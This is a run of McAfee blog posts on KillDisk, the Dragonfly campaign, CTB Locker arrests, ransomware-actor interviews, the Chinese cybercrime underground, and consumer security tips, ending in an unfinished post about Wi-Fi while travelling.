    We all remember Petya/NotPetya. How could you forget? The nasty malware took cues from WannaCry, leveraging the same SMB vulnerability. But instead of locking away files, Petya/NotPetya was a wiper – simply cleaning devices of their data. Petya was not the first wiper we’ve seen, and it’s certainly not the last. In fact, a classic disk wiper is currently re-emerging in Latin America, called KillDisk, and is targeting financial firms. Once dropped on a computer, it will load itself into memory, delete its files from disk, and rename itself.

    KillDisk is actually one of the most infamous malware families around. It has historically masked itself as ransomware, but is rather a very destructive wiper. Cybercriminals typically deploy it in the later stages of an infection so they can use it to hide their tracks by wiping disks and destroying forensic evidence. That’s precisely why it was paired together with the BlackEnergy malware during Telebots’ attacks on the Ukrainian power grid – so the cybercriminals could conduct their scheme with stealth.

    As Christiaan Beek, lead scientist and principal engineer at McAfee claims – that’s a wiper’s bread and butter. He says, “In the past we have seen wipers being used targeting the Energy sector in the Ukraine, Oil & Gas industry in the Middle-East, Media-company and against targets in South Korea. All of these were related to regional or political conflicts.”

    Destruction is clearly the end goal, but stealth is the way of getting there. Beek continues, “In 2017, we introduced the term pseudo-ransomware where destructive attacks disguised as ransomware either took down companies in a nation or were used to keep the IT-department busy while money was being transferred at the same time. Now with KillDisk, it seems that criminals do not hesitate to use it during their campaigns. Since the initial infection vector is unknown and we are lacking further samples or details, we can only speculate why they are using this.”

    That’s the ultimate question – why? Is KillDisk part of a larger attack, intended to help cybercriminals avoid detection? Or are crooks extorting these financial institutions for monetary gain? As of now, we’re unsure of the motive. But we do know that as this threat continues to evolve and creates a convincing smoke screen, we all must be as vigilant as ever.

    To learn more about our fight against ransomware, check out the alliance No More Ransom. And be sure to follow us at @McAfee and @McAfee_Labs.

    The post How Pseudo-ransomware KillDisk Creates a Smoke Screen for Cybercriminals appeared first on McAfee Blogs.

    2018 Resolution: Lose the Weight of Tech Safety Guilt Once and for All

    January is here, and we’ve got goals to crush. We want to be more productive. We want to spend more quality time with family. We want to get fit and lose some weight. Then there are those brave enough to tackle what’s going on in their parenting knower.

    The knower is located in every parent’s internal command center. It knows what it should do but hasn’t quite gotten around to doing it. It won’t appear on an anatomy chart, but if you are a parent, you know precisely where your knower is because you can feel the weight of the guilt that collects there. One of the biggest guilt generators is knowing what we should do to lock down our family’s digital life, but somehow keep putting it off.

    According to McAfee’s 2018 digital threat predictions several of the top technology threats coming our way this year target family safety specifically. The first threat: The growing power of the connected home and potential threats to family data privacy from big corporations. And, the second threat: Risky apps kids use and how companies can use content posted by users.

    Both issues are big deals as our homes become more connected in new ways that are both exciting and, frankly, concerning when it comes to the issue of privacy.

    So who is brave enough to lose the unwanted guilt weight? Here are a few easy things you can do to start 2018 to get your digital life in shape.

    Inventory Your Homefront

    Chances are you’ve accumulated a stockpile of digital products you don’t even realize pose a threat to your family’s security. Those devices likely need a password and privacy setting tuneup. Four steps to home safety: 1) Make a list of your devices 2) go into the settings and make the necessary updates 3) if a software update is needed, do that as soon as you get a notification. 4) To streamline that process, consider a central built-in security product that ensures every device in your house is well protected.

    Products to put on your list: Smart TVs, digital assistants such as Alexa and Echo, drones, laptops, tablets, personal computers, home automation systems such as The Nest, home security systems, your home network, smartphones, Bluetooth car kits, digital toys, game systems, electronic keypads on doors and garages, digital cameras, baby monitors, and any digital appliance. Even cars can be targets for hackers as seen in the Jeep hack of 2015, in which hackers used a laptop to disable a car’s engine on the freeway and forced Fiat Chrysler to recall hundreds of thousands of vehicles.

    With more homes becoming fully connected, experts agree it’s going to become harder to secure your privacy not only from hackers but marketers spying on users for profit. Do your homework on a product’s security standards before you purchase items and know what security gaps are currently in your home. Tip: Companies know that customers rarely read privacy agreements. Weak agreements tempt corporations to frequently change the privacy agreement after the devices and services are deployed to capture more customer information and revenue.

    Talk More About the Big 3

    Talking to your kids about digital safety is your most valuable defense against family security mishaps. Remind your kids of the Top Three Rules of Digital Responsibility 1) Don’t interact with strangers online 2) Don’t share personal information such as home address, email, birthdate or personal activities and plans and 3) Don’t upload or download inappropriate content or photos. The Internet never forgets and the damage done can be devastating.

    Pay Attention to App Privacy

    As identified in our threat predictions report, more and more kids are downloading apps with loose guidelines on how companies can use user-generated content. Educate your child about why this poses a danger and how daily interactions with these fun, social apps can affect their reputations in the future.

    Slow Down, Click with Care

    Living in a streaming, posting, click-here-now world has forced us to read and respond quickly. In doing so, we miss vital details, get in digital misunderstandings, and risk our privacy by clicking suspicious links. In 2018, take back your digital control by merely slowing down. Be it email, texts, social media posts — stop and think before you post, respond, or click links. Cybercrooks understand our habits and are always looking to exploit our weak points.

    Make More Meaningful Connections

    The ability to connect with others 24/7 can be both empowering and debilitating. We know in our knower when we are spending too much time glued to our smartphone and when our kids are also. Online connections will never compare to the rich relationships we can experience offline. This year, resolve to help your kids maintain a healthy perspective on digital versus face-to-face interactions. A healthy digital balance is especially crucial during tween and teen years since studies show that the more time kids spend online, the more isolation and depression can set in. Resolve to curb screen time by modeling balance, planning physical activity and phone-free outings, and establishing phone free zones in the home.

    Remember, in making changes in this new year resolve not to look back. Embrace 2018 for all it is: A clean slate primed and ready for your family to establish and set new habits in motion. You’ve got this!

    toni page birdsong


    Toni Birdsong is a Family Safety Evangelist to McAfee. You can find her on Twitter @McAfee_Family. (Disclosures).


    The post 2018 Resolution: Lose the Weight of Tech Safety Guilt Once and for All appeared first on McAfee Blogs.

    Be Unhackable: Here’s Your Post-Holiday Gift Safety Checklist

    ‘Twas the night after Christmas, when all through the house
    All the smart toys were buzzing and beeping about,
    The chargers were plugged near the chimney with care,
    Without a clue that the hackers soon would be there.

    With the height of the season now behind us, you may be experiencing a bit of a holiday hangover. But as you wade through the holiday fallout of wrapping paper, instruction manuals, batteries packs, and downloads, don’t forget that the most important step to your family enjoying its cache of digital gifts is protecting them.

    McAfee’s Most Hackable Toys  2017 survey revealed our shared habits of connectivity minussolid safeguards. What we know: While most of us realize the importance of protecting our internet-connected devices, we aren’t too concerned with making device security a priority.

    So, now that you’ve purchased that new smartphone, drone, smart toy, or appliance, take that next simple step to secure your expanding digital home. Here’s a short, post-holiday checklist to help get you started.

    Smart Gift Checklist

    Settings, passwords, software. Once you’ve powered up your new device: 1) Make sure it’s password protected with tw0-step authentication. 2) Set a pin or passcode to lock your device. 3) Install the latest software versions as soon as possible and update them regularly. 4) Protect your new devices with additional security software if possible. 5) Avoid downloading suspicious apps and never click on strange links that arrive via email, messenger, or text. 6) And here’s a biggie: If you are selling, donating, or recycling your old devices, make sure you wipe them clean.

    Research the risks. According to the same McAfee study, some of the most popular digital gifts of 2017 include tablets, smartphones, drones, digital assistants, and connected toys and appliances — all of which come with inherent security risks. With the growing list smart devices, hackers have a million new entryways into our homes. Google the name and model of your new gift and read about possible security holes. Another valuable resource is online reviews posted by people who have encountered security issues.

    ‘Take Five’ before having fun. Securing a new gift often takes five minutes, but it’s a must in today’s wired world. Go into your new product’s privacy settings and change manufacturer settings and set a new password. Keep the process simple and allow your kids to do it alongside you so that device security is more likely to become a habit.

    Don’t be duped by cute. From fuzzy talking puppies to adorable dolls, toys can also carry massive security risks. It’s important to research if there have been any reported security vulnerabilities with toys you’ve purchased or have been gifted, so you know how to secure them. Don’t let a toy’s appearance lull you into a false sense of security. Remember: It may look like a kitty cat, but if it connects to the world wide web, then it’s a computer that could be transmitting data to a remote server. When using connected toys: 1) Use toys in places with trusted and secured wi-fi. 2) Monitor your child’s activity with the toys (such as conversations and voice recordings) through the toy’s partner parent application, if available. 3) Take time to read the toy’s disclosures and privacy policies.

    Refresh passwords on your home network. Secure all of your connected devices and your home internet at its source — the network. Avoid routers that come with your ISP (Internet Security Provider) since they are often less secure. And, make it a point to change your passwords regularly.

    It’s impossible to protect against all risks, but you can frustrate a hacker’s plans by putting up some security obstacles. Even though security and privacy risks come with our new gifts, it’s clear that the demand for faster, better, more impressive digital products is here to stay. Taking the time to boost your family’s security will help make sure this holiday remains a happy one into the New Year and beyond.

    The post Be Unhackable: Here’s Your Post-Holiday Gift Safety Checklist appeared first on McAfee Blogs.

    McAfee Labs Advanced Threat Research Aids Arrest of Suspected Cybercrime Gang Linked to Top Malware CTB Locker

    In our recent research, we interviewed the actors behind ransomware campaigns. One of the interesting findings was cybercriminals seemed to have a sense of absolute safety when conducting criminal operations. Cybercrime is an area of crime like no other, perceived as low-risk with high returns, which contributes greatly to its rapid growth.

    Today, with the arrest of individuals suspected of infecting computer systems by spreading the CTB Locker malware, a clear message has been sent—involvement in cybercrime is not zero-risk.

    CTB Locker

    CTB Locker, also known as Critroni, is known as one of the largest ransomware families—helping to drive a new ransomware surge of 165 percent in 2015 as one of the top three ransomware families, and earning a spot as No. 1 just a year later. Operation Tovar, in which law enforcement agencies took down the infrastructure responsible for spreading CryptoLocker, created a need for more malware—CTB Locker and CryptoWall malware families helped to fill the gap.

    In June 2014, the CTB Locker authors began to advertise the malware family on the underground scene at a cost of $3,000USD, where people could buy the first versions for $1,500USD. The authors also offered an affiliate program, which made CTB Locker infamous. By sharing a percentage of the received ransoms, the affiliates ran the greater risk—because they had to spread the ransomware—but they also enjoyed the higher profits. By using exploit kits and spam campaigns, the malware was distributed all over the world, mostly targeting “Tier 1” countries, those in which the victims could afford to pay and most likely would pay the ransom. Midway through 2015, we gained unique information from an affiliate server that helped us tremendously in the subsequent investigations.

    A CTB Locker affiliate server.
    An example of CTB Locker source code.

    Besides the use of an affiliate server in CTB Locker’s infrastructure, two other components complete the setup: a gateway server and a payment server.

    Attacks Begin to Grow

    During 2016, a massive spam campaign struck the Netherlands. Emails in Dutch seemed to originate from one of the largest telco providers. The emails claimed to have the latest bill attached. There was no bill, of course, rather CTB Locker asking for around $400USD of ransom to return files. The grammar and word usage was near perfect—not what we commonly observe—and the names in the email were proof of a well-prepared campaign. More than 200 cases in the Netherlands alone were filed with regards to these infections.

    With attacks growing in number, the Dutch High Tech Crime Unit began an investigation. The unit approached McAfee’s Advanced Threat Research team to assist in identifying samples and answering questions.

    Following our research, we were kept updated and were informed that in the early morning of December 14 operation “Bakovia” started. The initial research was on the CTB Locker ransomware but based on information from the U.S. Secret Service, it was determined that the same suspected gang was also linked to distribution of Cerber ransomware—another major family.

    The Arrests

    During the operation in East Romania, six houses were searched whereby the investigators seized a significant amount of hard-drives, laptops, external-storage, crypto-currency mining rigs, and hundreds of SIM cards. Suspects were arrested for allegedly spreading CTB Locker ransomware, and other suspects allegedly responsible for spreading Cerber were arrested at the airport in Bucharest.

    Watch video of arrests. 

    The law enforcement action emphasizes the value of public-private partnerships and underscores the determination behind the McAfee mantra “Together is power.”

    The post McAfee Labs Advanced Threat Research Aids Arrest of Suspected Cybercrime Gang Linked to Top Malware CTB Locker appeared first on McAfee Blogs.

    What To Do If Your Email Is Hacked

    I think I could count on my hand the people I know who have NOT had their email hacked. Maybe they found a four-leaf clover when they were kids!

    Email hacking is one of the very unfortunate downsides to living in our connected, digital world.  And It’s often a situation that even the savviest tech experts find themselves in. In August this year, over 700 million email addresses (and a large number of passwords) were leaked publicly courtesy of a misconfigured spambot (a program designed to collect email addresses). Many savvy tech types were caught up in the hack including Troy Hunt, a leading Australian computer security expert and creator of Have I Been Pwned?.

    Just this month it was confirmed that every single Yahoo email account was compromised in the 2013 data breach. A whopping 3 billion accounts with stolen data including names, email addresses, phone numbers and birth dates. And recent reports have confirmed that thousands of Australian Government Officials including high-profile politicians, Defence Officials, judges and members of the Australian Federal Police were among the victims.

    So, in short – it can happen to anyone…

    But Why Should I Worry? I Have Nothing Valuable in My Email

    If you have an identity and email address you are very valuable to a hacker – no exceptions! Even if you don’t consider yourself to have Kim Kardashian’s celebrity status or the CEO power of  James Packer, a hacker is still very keen to collect every piece of information they can about you.

    Remember, hackers want to get their hands on your data. Why – I hear you ask? So, they can cash in! Some will keep the juicy stuff for themselves – passwords or logins to government departments or large companies they may want to ’target’. But the more sophisticated ones will sell your details including name, telephone, email address and credit card details and cash in on The Dark Web. They often do this in batches. Some experts believe they can get as much as AU$140 for a full set of details including credit cards.

    So, you can see why they’d be interested in you!

    How Big Is the Problem?

    There is a plethora of statistics on just how big this issue is – all of them concerning!

    According to IDCARE – a support service for Australian and New Zealand victims of identity fraud – about 1 million Australian have their identity stolen each year at a cost of about $1 billion.

    The Australian Competition and Consumer Commission (ACCC) recently revealed that hacking scams cost Australian businesses close to $3 million during 2016 with the number of people reporting scams activity at record levels.

    The Australian Cyber Security Centre nominates $20 million as the fallout from ‘phony emails’ aka phishing in 2016/7.

    Regardless of which statistic you choose to focus on, we have a big issue on our hands!

    So, What Do I Do If My Email Is Hacked?

    If you find yourself a victim of email hacking there are a few very important steps you need to take. But the key here is to act FAST!!

    1. Change Your Password

    This is the very first thing you must do to ensure the hacker can’t get back into your account. It is essential that your new password is complex and totally unrelated to previous passwords. Always use at least 8-10 characters with a variety of upper and lower case and throw in some symbols and numbers. I really like the idea of a crazy, nonsensical sentence – easier to remember and harder to crack!

    If you find the hacker has locked you out of your account by changing your password, you will need to rest the password to by clicking on the Forgot My Password link.

    2. Let Your Email Contacts Know

    A big part of the hacker’s strategy is to ‘get their claws’ into your address book with the aim of hooking others as well. Send a message to all your email contacts as soon as possible so they know to avoid opening any emails (most likely loaded with malware) that have come from you.

    3. Change Your Security Question

    If you have a security questions associated with your email account, please change this too. And please make it unpredictable and niche! It is possible that this was how the hackers broke into your account in the first place. When Yahoo had 500 million accounts hacked in 2014, not only were the passwords stolen but the security questions too. If you have a security question associated with your account, make up a response that makes no sense. This is the perfect opportunity to tell a lie!

    4. Commit to Multi Factor Authentication

    Yes, multi-factor authentication adds another step to your login but it also adds another layer of protection. Enabling this will mean that in addition to your password, you will need a special one-time use code to login. This is usually sent to your mobile phone. So worthwhile!

    5. Check Your Email Settings

    It is not uncommon for hackers to modify your email settings so that a copy of every email you receive is automatically forwarded to them. Not only can they monitor your logins for other sites but they’ll keep a watchful eye over any particularly juicy personal information! So, check your mail forwarding settings to ensure no unexpected email addresses have been added.

    Don’t forget to check your email signature to ensure nothing spammy has been added. And also ensure your ‘reply to’ email address is actually yours! Hackers have been known to create an email address here that looks similar to yours – when someone replies, it goes straight to their account, not yours!

    6. Scan Your Computer for Malware and Viruses

    This is essential also. If you find anything, please ensure it is addressed and then change your email password again. And if you don’t have it – please invest. Comprehensive security software will provide you with a digital shield for your online life. McAfee Total Protection lets you protect all your devices – including your smartphone – from viruses and malware. It also contains a password manager to help you remember and generate unique passwords for all your accounts.

    7. Change Any Other Accounts with the Same Password

    Time consuming but very worthwhile! Ensure you change any other accounts that use the same username and password as your compromised email. Hackers love the fact that many of us use the same logins for multiple accounts, so it is guaranteed they will try your info in other email application and sites such as PayPal, Amazon, Netflix – you name it!

    8. Consider Creating a New Email Address

    If you have been hacked several times and your email provider isn’t mitigating the amount of spam you are receiving, then consider starting afresh but don’t delete your email address! Many experts do warn against deleting email accounts as most email providers will recycle your old email address. This could mean a hacker could spam every site they can find with ‘forgot my password’ request and try to impersonate you – identity theft!

    Your email is an important part of your online identity so being vigilant and addressing any fallout from hacking is essential for your digital reputation. And even though it may feel that ‘getting hacked’ is inevitable, you can definitely reduce your risk by installing some good quality security software on all your devices. Comprehensive security software such as McAfee Total Protection will alert you when visiting risky websites, warn you know when a download looks ‘dodgy’ and will block annoying and dangerous emails with anti-spam technology.

    It makes sense really – if don’t receive the ‘dodgy’ phishing email – you can’t click on it! Smart!

    And finally, don’t forget that hackers love social media – particularly those of us who overshare on it. So, before you post details of your adorable new kitten, remember it may just provide the perfect clue for a hacker trying to guess your email password!


    Alex x

    The post What To Do If Your Email Is Hacked appeared first on McAfee Blogs.

    Operation Dragonfly Analysis Suggests Links to Earlier Attacks

    On September 6, Symantec published details of the Dragonfly campaign, which targeted dozens of energy companies throughout 2017. This attack was effectively Dragonfly 2.0, an update to a campaign that began in 2014.

    Moving beyond our 2014 analysis of Dragonfly, our current focus looks at the attack’s indicators to determine whether we can glean any further information regarding the source and possible motivations of those behind the campaign. The campaign targets energy companies around the world by leveraging spear-phishing emails that, once successful, allow the attackers to download Trojan software. The Trojans provide access to the victims’ systems and networks.

    Going Beyond Energy

    Although initial reports showed Dragonfly attacks targeting the energy sector, investigations by McAfee Labs and the Advanced Threat Research team uncovered related attacks targeting the pharmaceutical, financial, and accounting industries. Everything about this campaign points to a well-prepared assault that carefully considers each target, and conducts reconnaissance before taking any measures to exploit compromised targets.

    We saw the group use several techniques to get a foothold in victims’ networks, including spear phishing, watering holes, and exploits of supply-chain technologies via previous campaigns. By compromising well-established software vulnerabilities and embedding within them “backdoor” malware, the victims think they are installing software from a trusted vendor, while unaware of the supply-side compromise.

    Once the attackers have a foothold, they create or gain user accounts to operate stealthily. Using the remote-desktop protocol to hop among internal or external systems, they connect either to a control server if the risk is minimal or use an internal compromised server to conduct operations.

    The last wave of attacks used several backdoors and utilities. In analyzing the samples, we compared these with McAfee’s threat intelligence knowledge base of attack artifacts.

    One of the starting points was a Trojan in the 2017 campaign with the following hashes:

    • MD5: da9d8c78efe0c6c8be70e6b857400fb1
    • SHA-256: fc54d8afd2ce5cb6cc53c46783bf91d0dd19de604308d536827320826bc36ed9

    Comparing this code, we discovered another sample from the group that was used in a July 2013 attack:

    • MD5: 4bfdda1a5f21d56afdc2060b9ce5a170
    • SHA-256: 07bd08b07de611b2940e886f453872aa8d9b01f9d3c61d872d6cfe8cde3b50d4
    • Filename: fl.exe

    The file was downloaded after a Java exploit executed on the victim’s machine, according to the 2013 attack report. After analyzing the 2013 sample, we noticed that some of the executable’s resources were in Russian.

    Comparing the code, we find the 2017 sample has a large percentage of the same code as the backdoor used in the 2013 attacks. Further, some code in the 2017 backdoor is identical to code in the application TeamViewer, a legitimate remote administration tool used by many around the world. By incorporating the code and in-memory execution, the attackers avoid detection and leave no trace on disk.

    The correlating hash we discovered that contained the same TeamViewer code was reported by Crysys, a Hungarian security company. In their report on about ‘“TeamSpy,” they mentioned the hash we correlated as well: 708ceccae2c27e32637fd29451aef4a5. This particular sample had the following compile date details: 2011:09:07 – 09:27:58+01:00

    The TeamSpy attacks were originally aimed at political and human right activists living in the Commonwealth of Independent States (the former Soviet Union) and eastern European countries. Although the report attributes the attacks to a threat actor or actors and shared tactics and procedures, the motivations behind TeamSpy appear similar to those of the Dragonfly group. With identical code reuse, could the TeamSpy campaign be the work of Dragonfly?

    But that’s not all of interest. We also discovered that the 2017 sample contained code blocks associated with another interesting malware family: BlackEnergy. Let’s look at an example of the code similarities we discovered:

    A BlackEnergy sample from 2016 (at left) alongside a Dragonfly sample from 2017.

    Self-deleting code is very common in malware, but it is usually implemented by creating a batch file and executing the batch instead of directly calling the delete command, as we see in the preceding examples.

    The BlackEnergy sample used in our comparison was captured in the Ukraine on October 31, 2015, and was mentioned in our post on the evolution of the BlackEnergy Trojan. It is remarkable that this piece of code is almost identical in both samples, and suggests a correlation between the BlackEnergy and Dragonfly campaigns.

    Actor Sophistication

    Our analysis of this attack tells a story about the actors’ capability and skills. Their attack precision is very good; they know whom and what to attack, using a variety of efforts. Their focus is on Windows systems and they use well-known practices to gather information and credentials. From our research, we have seen the evolution of the code in their backdoors and the reuse of code in their campaigns.

    How well do the actors cover their tracks? We conclude they are fairly sophisticated in hiding details of their attacks, and in some cases in leaving details behind to either mislead or make a statement. We rate threat actors by scoring them in different categories; we have  mentioned a few. The Dragonfly group is in the top echelon of targeting attackers; it is critical that those in the targeted sectors be aware of them.

    The Dragonfly group is most likely after intellectual property or insights into the sector they target, with the ability to take offensive disruptive and destructive action, as was reported in the 2015 attack on the Ukrainian power grid by a BlackEnergy malware family.


    We would like to thank the team at Intezer for their assistance and support during our research.

    The post Operation Dragonfly Analysis Suggests Links to Earlier Attacks appeared first on McAfee Blogs.

    Looking Into the World of Ransomware Actors Reveals Some Surprises

    During the preparations for our keynotes at McAfee’s recent MPOWER conference, we brainstormed a few topics we wanted to share with the audience. Ransomware was definitely on our agenda, but so much has already been said and written on the subject. What could we add that would be interesting?

    We hit on the angle: to dive into this shady world and learn about the people behind these campaigns. There are several ways to approach this. We could go into forums and look for the individuals who discuss these campaigns or offer ransomware for sale. But that would be very time consuming and the chance of finding the right individuals would be small. There is a better way.

    In most samples of ransomware, once they malware executes and files are encrypted, the “ransom note” appears. Either a background drop or a text file contains the details. During 2017 we saw many of these notes contain an email address for questions or for payment details and releasing files.


    We looked at three months of unique ransomware samples and extracted either the images or the notes that contained the contact addresses. As new ransomware families popped up in our tracker, we verified them and added the addresses—because these fresh attacks made it likely the authors would interact with us.

    But how could convince the actors to answer our questions? We took the role of students working on a master thesis and asked the actors if they would be willing to answer a few questions. For a couple of weeks we lived the role of students, eating lots of pizza, drinking sodas, and so on. (You have to live the role, right?)

    We sent our emails and queried the actors who responded. One of our first observations was that of all the emails we retrieved, about 30 percent were either fake or nonexistent. So in these cases when files were encrypted and the victim decided to pay, using email to send evidence of payment was useless. The money was gone (as well as the files).

    During the first week of our research we received answers back from some of the actors, but most were not willing to cooperate. That’s no surprise: They were cautious about revealing their identity.

    During the second week, we had better luck and started to chat with a few. That number grew, and after a few weeks we had a great collection of conversations with the actors.

    “Fast, easy, and safe”

    When we asked why they started a career in ransomware, most answered with variations on “enough money” and “fast, easy, and safe,” especially when using anonymous email services and cryptocurrency for payments.

    Homemade vs. Off the Shelf

    Most of the actors we spoke with wrote their own ransomware. They had looked at the published source code but were clever enough to come up with their own variants that contained new techniques or different approaches to keep detections low. The longer they stayed out of sight of endpoint security solutions, the longer was their opportunity to make money.

    Spending Their Ill-Gotten Gains

    They spend the revenue they gained from their campaigns in various manners: travel, cars. One had many affiliates working for him so he was soon going to buy a house. One of the most surprising answers was that one turned to ransomware to “pay off his debts.”

    Willing to Negotiate

    Although they often have the image of being ruthless, almost all of them claimed a willingness to negotiate the ransom price in case victims could not afford to pay the demanded amount.

    Tracking the Authors

    One of the actors so enthusiastic he wanted to sell us ransomware code so we could pay off our college debts. Based on his answers and sharing of information, we noticed that he was not a very experienced actor and he gave clues on his whereabouts. In one of the conversations, he shared some examples, but the data was not scrubbed. By correlating the data he provided with other information, such as email time zones and mistakes in his English, we traced him to Dakar, Senegal. He not only sends ransomware but also sells botnets and other fraud-related services.

    We found the research eye opening. Now we just need a few weeks in the gym to work off all the sodas and pizzas.

    For those suffering from a ransomware attack, you have three options. The first two are bad: lose your files, or pay the ransom and hope (with no guarantee) for a key to unlock your files. The best option is to start with a visit to to see if a decryption tool is available.

    Meanwhile, remember the standard advice on reducing your risk of picking up ransomware: Keep your OS, security, and application software up to date; exercise a healthy dose of skepticism even when you see messages that appear to come from legitimate sources; and do not click on links or open files from unknown names or organizations.


    Learn more about the threat statistics we gathered in Q3, including ransomware in the McAfee Labs Threats Report, December 2017 and follow the team on Twitter at @McAfee_Labs.

    The post Looking Into the World of Ransomware Actors Reveals Some Surprises appeared first on McAfee Blogs.

    McAfee Labs Reports All-Time Highs for Malware in Latest Count

    In the third quarter of 2017, McAfee Labs reports all-time highs of new and total malware. What is causing the increasing numbers of malware that are submitted to us at an average rate of four new malware samples per second?

    One major trend that continues in Q3 is the abuse of Microsoft Office–related exploits and the use of malicious code in macros that activates PowerShell to execute them, so-called fileless attacks.

    In March, an exploit was released that took advantage of CVE-2017-0199, a vulnerability in how Microsoft Office and WordPad handle specially crafted files that could result in remote code execution. During Q3, we saw an increase in the number of crafted files that were submitted. We also noticed that many releases take advantage of a toolkit on GitHub that makes it quite easy to create a “backdoor” attack:

    Another major event in Q3 was a massive spam campaign to distribute a new version of the infamous Locky ransomware “Lukitus.” Within 24 hours, more than 23 million emails were sent. Shortly after the first arrived, security company Comodo Labs discovered another campaign related to this attack that sent more than 62,000 spam emails distributing the ransomware.

    With banking Trojans, we observed the greatest activity from the Trickbot Trojan. We saw several variations in which the actors added new features to their code, for example, cryptocurrency stealing, embedding the EternalBlue exploit, and employing different ways of delivering the malware, which primarily targets the financial sector.

    Another banking Trojan family that appeared often during the quarter was Emotet. In several spamming campaigns users were asked to download a Microsoft Word document from several locations. From our analysis of the attached document, we found the payload was hidden in the macros that used PowerShell to install the Trojan.

    These major campaigns and others caused a tsunami of spam email, distributing a tremendous number of samples that increased the malware storage demands of all of us in the security industry.

    For more details and our usual statistics on malware, breach incidents, and web and network threats, read the McAfee Labs Threats Report, December 2017.

    The post McAfee Labs Reports All-Time Highs for Malware in Latest Count appeared first on McAfee Blogs.

    Chinese Cybercriminals Develop Lucrative Hacking Services

    Underground cybercrime profits in China have likely already exceeded US$15.1 billion (100 billion Chinese yuan); caused more than $13.8 billion (91.5 billion yuan) worth of damage relating to data loss, identity theft, and fraud; and will grow at an even faster pace as underground hackers expand international business operations to increasingly target foreign businesses, according to one report. Advanced hacking tools such as botnet, control server infrastructure, remote access tools, malware creation and obfuscation services, source-code writing services, and targeted exploitation toolkits are available on underground markets.

    Other popular malicious tools and hacking services—such as spam and flooding services, denial-of-service or distributed denial-of-service attack scripts, compromised routers, and hijacked accounts—are also available in China on the black market. Criminal groups are well-organized and establish discreet buying and selling processes for malware and hacking services through QQ networks. (Tencent QQ is one of China’s most popular online communication and Internet service portals. It had more than 870 million active monthly users as of 2016. QQ users can communicate with each other or publish comments through QQ forums, shared space, QQ groups, and private chatrooms.)

    Criminal groups also establish master-apprentice relationships to recruit and train new members to expand their criminal enterprise operations. All of these trends cost businesses in China and around the world tens of billions of dollars, as hacking tools sold online can be used to steal intellectual property or create social engineering attacks.

    Operating Structure

    The Chinese cybercriminal underground market has become more sophisticated and service-oriented as China’s economy becomes more digital. Cybercriminal groups are well-structured with a clear division of work. Contrary to their American and Russian counterparts, Chinese cybercriminals do not rely on the Deep Web. McAfee research indicates that there has been an increasing number of organized crime groups that take advantage of burgeoning QQ networks. These organized crime groups typically possess clear mechanisms for their cybercrime operations. Malware developers usually profit by creating and selling their products online; they do not get involved in underground criminal operations. Their code often includes “backdoors” that offer them continued access to their software.

    QQ hacking group masters (qunzhu, 群主), also known as prawns (daxia, 大虾) or car masters (chezu, 车主) by those in Chinese cybercriminal underground networks, are the masterminds of cybercrime gangs. QQ hacking group masters purchase or acquire access to malware programs from a malware writer or wholesaler. As shown in the following graph, QQ hacking group masters recruit members or followers, who are commonly known as apprentices, and instruct apprentices on hacking techniques such as setting up malicious websites to steal personally identifiable information or bank accounts. In most cases, QQ hacking group masters collect “training fees” from the apprentices they recruit. The apprentices later become professional hackers working for their masters. Apprentices are also required to participate in multiple criminal “missions” before they complete the training programs. These hacker groups are usually private: The group masters can accept or deny membership requests on QQ networks.


    Master-Apprentice Mechanism

    Black-hat training is growing in popularity on the black market due to high profit margins in the hacking business. Some hacker groups use these training programs to recruit new members.  Once they complete the training, selected members will be offered an opportunity as apprentices or “hackers in training,” who later become full-time hackers responsible for operations such as targeted attacks, website hacking, and database exfiltration. (See the preceding graph.) The apprentices gain further experience by taking part in cybercrime schemes, including stealing bank account passwords, credit card information, private photos, personal videos, and virtual currency such as Q coins. The following screenshot is an example of black-hat hacker training materials offered by an underground hacker.

    Training program offered by an underground hacker.


    The Chinese cybercriminal underground business has become more structured, institutional, and accessible in recent years. A great number of QQ hacking groups offer hacking services. Just as in the real world, cybercriminals and hackers take online orders. Prospective customers can fill out their service requests—including types of attacks, targeted IP addresses, tools to be deployed—and process the payments online. For example, some QQ groups provide website takedown services, which can cost up to tens of thousands of yuan, depending on the difficulty of the tasks and the security level of a targeted system. There are also QQ groups that hire black-hat hackers to conduct attacks against commercial and government targets for profit. The following list shows many of the top activities:

    • DDoS services
    • Black-hat training
    • Malware sales
    • Advanced persistent attack services
    • Exploit toolkits sales
    • Source-code writing services
    • Website hacking services
    • Spam and flooding services
    • Traffic sales
    • Phishing website sales
    • Database hacking services

    Buying Hacking Services and Malware

    Some hacking groups provide 24/7 technical support and customer service for customers who do not have a technical background. A hacking demonstration is also available upon request. Prices are negotiable in some cases. After agreeing on the price, the hacker-for-hire sends an email confirmation with detailed payment information. Prospective clients can transfer payments online through Taobao or Alipay.  However, prospective customers are usually required to submit an upfront deposit, which can be as much as 50% of the agreed price. Once the service is complete, the hacker-for-hire will request payment on the remaining balance.

    Steps in the hacking service transaction process:

    • Negotiating price
    • Making a deposit
    • Demonstration (if requested)
    • Beginning the hacking services
    • Paying the balance

    Buyers must submit full payment for software purchases such as malware, attack tools, and exploit toolkits.

    Steps in the malware purchase transaction process:

    • Negotiating price
    • Paying in full for malware
    • Receiving product or exploit kit


    The Chinese cybercriminal underground mostly targets Chinese citizens and businesses. However, a growing number of criminal groups offer hacking services that target foreign websites or businesses. These underground criminal groups are stealthy and have gradually grown in sophistication through an institutionalized chain of command, and by setting master-and-apprentice relationships to expand their business operations.  They offer a variety of malicious tools and hacking services through QQ networks and have established successful surreptitious transaction processes.


    Follow all our research and stories like these on Twitter at @McAfee_Labs.

    The post Chinese Cybercriminals Develop Lucrative Hacking Services appeared first on McAfee Blogs.

    Kids, Travel and Wi-Fi

    If your brood of kids is anything like mine, holiday travel is all about devices and Wi-Fi. Sure, we’ll focus on sights and activities when we get to our destination, but the journey is made all the sweeter with a huge dose of technology!

    And as all my boys have pretty basic mobile phone plans (I’m paying!), a technology binge means Wi-Fi! Whether it’s connecting at the airport, on the plane – yes this is a thing now, in trains or in hotels – finding Wi-Fi is possibly more important to my boys than finding the next snack bar.

    But unfortunately, Wi-Fi is not the great nirvana. There can be some serious risks associated with connecting to random Wi-Fi outlets, as I continuously tell my offspring. The recent KRACK Wi-Fi saga, which potentially affected iOS and Android users worldwide, gave us all a big scare and reminded us yet again that modern Wi-Fi is not risk free.  Discovered by a Belgian researcher, the KRACK vulnerability meant a hacker could access your device even through a password protected Wi-Fi network. It was such a big deal that even the US Department of Homeland Security issued a warning!

    ‘It Won’t Happen To Me’

    Regardless of the warnings, there are still many amongst us that are not convinced Wi-Fi poses genuine risks, particularly when we travel. Many of my friends and family members still believe horror stories only happen to ‘other people’.

